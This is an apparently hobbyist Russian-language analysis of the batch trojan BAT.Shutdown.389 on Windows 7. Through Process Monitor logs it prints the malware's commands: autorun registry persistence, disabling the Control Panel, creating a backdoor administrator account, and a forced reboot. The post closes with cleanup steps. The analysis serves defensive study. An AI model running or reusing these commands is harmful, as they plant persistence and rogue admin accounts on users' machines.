Анализ вируса из архива opera.rar
BAT.Shutdown.389 (по классификации dr.web)
Исходные данные:
ОС Win7 ult x32
Версия ОС: 6.1.7601 Service Pack 1 сборка 7601
Установленные обновления:
Definition Update for Windows Defender - KB915597 (Definition 1.149.1652.0)Включен UAC на максимальный уровень, работа ведется от администратора.
Вирус начал весьма бодренько, через 5 секунд компьютер ушел в перезагрузку, что меня категорически не устроило, поэтому я полез в локальные политики безопасности и снял с себя права на выключение.
После этого я перезашел в систему, дабы политики применились, и убедился, что кнопка выключения неактивна.
Вирус начал с банальности, распаковав себя в %temp%
Правда в виде bat файла.
Date & Time: 29.05.2013 21:30:27
Event Class: File System
Operation: CreateFile
Result: SUCCESS
Path: C:\Users\Freelncr\AppData\Local\Temp\B7AA.tmp\opera.bat
TID: 3632
Duration: 0.0000918
Desired Access: Generic Read/Write
Disposition: OverwriteIf
Options: Synchronous IO Non-Alert, Non-Directory File
Attributes: N
ShareMode: Read
AllocationSize: 0
OpenResult: Created
Дальше он через CMD запустил сам себя, извращенец.
Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\cmd.exe
TID: 3632
Duration: 0.0000000
PID: 3672
Command line: cmd /c ""C:\Users\Freelncr\AppData\Local\Temp\B7AA.tmp\opera.bat""
Следующий шаг - безуспешная попытка скопировать себя в windows\system32
Date & Time: 29.05.2013 21:30:28
Event Class: File System
Operation: CreateFile
Result: ACCESS DENIED
Path: C:\Windows\System32\File.bat
TID: 3676
Duration: 0.0001202
Desired Access: Generic Write, Read Data/List Directory, Read Attributes, Delete
Disposition: OverwriteIf
Options: Sequential Access, Non-Directory File
Attributes: ANCI
ShareMode: None
AllocationSize: 0
Далее он с помощью утилиты reg добавил себя в автозагрузку HKLM
Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\reg.exe
TID: 3676
Duration: 0.0000000
PID: 3668
Command line: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Filel" /t REG_SZ /d "C:\Windows\system32\File.bat" /f
Далее идет попытка отключить панель управления. Fail
Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\reg.exe
TID: 3676
Duration: 0.0000000
PID: 2472
Command line: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
Date & Time: 29.05.2013 21:30:28
Event Class: Registry
Operation: RegCreateKey
Result: ACCESS DENIED
Path: HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
TID: 3792
Duration: 0.0000139
Desired Access: Read/Write
Следующий шаг - установка кодировки cp1251 для CMD.
Для чего - мы увидим через несколько шагов.
Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Start
Result: SUCCESS
Path:
TID: 3676
Duration: 0.0000000
Parent PID: 3672
Command line: chcp 1251
Current directory: C:\Users\Freelncr\Desktop\
Далее вирус удаляет support юзера. Fail
Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\net.exe
TID: 3676
Duration: 0.0000000
PID: 3024
Command line: net user SUPPORT_388945a0 /delete
И дальше начинается полная порнография. Вирус добавляет пользователя "Писька" с паролем 111. Fail
Вот зачем был нужен cp1251.
Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Start
Result: SUCCESS
Path:
TID: 3676
Duration: 0.0000000
Parent PID: 3672
Command line: net user писька 111 /add
Далее вирус добавляет письку в администраторы, гы гы гы. Fail
Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\net.exe
TID: 3676
Duration: 0.0000000
PID: 3772
Command line: net localgroup Администраторы писька /add
Удаляет support из пользователей, неуспешно.
Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\net.exe
TID: 3676
Duration: 0.0000000
PID: 3748
Command line: net localgroup Пользователи SUPPORT_388945a0 /del
Далее создает ещё один bat файл в system32. Опять неуспешно, прям пичаль какая.
Date & Time: 29.05.2013 21:30:28
Event Class: File System
Operation: CreateFile
Result: ACCESS DENIED
Path: C:\Windows\System32\batinit.bat
TID: 3676
Duration: 0.0000398
Desired Access: Generic Write, Read Data/List Directory, Read Attributes, Delete
Disposition: OverwriteIf
Options: Sequential Access, Non-Directory File
Attributes: ANCI
ShareMode: None
AllocationSize: 0
Далее добавляет в autorun command processor свой батник. Да ещё с ошибками :)
"C:\Windows\
syste m32\batinit.bat"
Этот ключ реестра отвечает за строчку, которая отображается в верху командной строки при запуске. Обычно это
"Microsoft Windows [Version 6.1.7601]
(c) Корпорация Майкрософт (Microsoft Corp.), 2009. Все права защищены."
Т.е данный батник обрабатывался бы при каждом запуске CMD.
в нашем случае это было чуть другое :)
Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\reg.exe
TID: 3676
Duration: 0.0000000
PID: 2264
Command line: reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\syste m32\batinit.bat" /f
Ну и конечно shutdown, даже с комментарием lol.
Date & Time: 29.05.2013 21:30:29
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\shutdown.exe
TID: 3676
Duration: 0.0000000
PID: 2832
Command line: shutdown -r -t 1 -c "lol"
Ну и одновременно с shutdown идет зачистка временных файлов и т.д.
Резюме:
Есть мнение, что создатель данного винлока ходит по городу и рисует слово "х.." на заборах, потому как данный вирус занимается исключительно созданием пользователя "писька" и прочим вандализмом.
Опасность: Средняя, при заражении может доставить уйму неприятностей, т.к. комп будет убегать в ребут сразу после входа в систему. Плюс нестандартный подход с
HKCU\SOFTWARE\Microsoft\Command Processor, что тоже может вызвать дополнительные проблемы.
В итоге данный винлок так и не смог провести заражение, UAC отработал на 5. Разве что компьютер он смог перезагрузить один раз, правда после перезагрузки вирусу было неоткуда запускаться, все попытки записаться в system32 были неуспешны.
Лечение : не требуется. Разве что нужно починить параметр
HKCU\SOFTWARE\Microsoft\Command Processor.
При успешном заражении ручное лечение будет заключаться в очистке параметров реестра :
"HKCU\SOFTWARE\Microsoft\Command Processor"
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Filel "
И удалении файлов:
C:\Windows\System32\File.bat
C:\Windows\System32\batinit.bat
Плюс потребуется удаление письки, гы гы гы.
Ну и напоследок скрин с вирустотала.
И второй, с анализом двухдневной давности.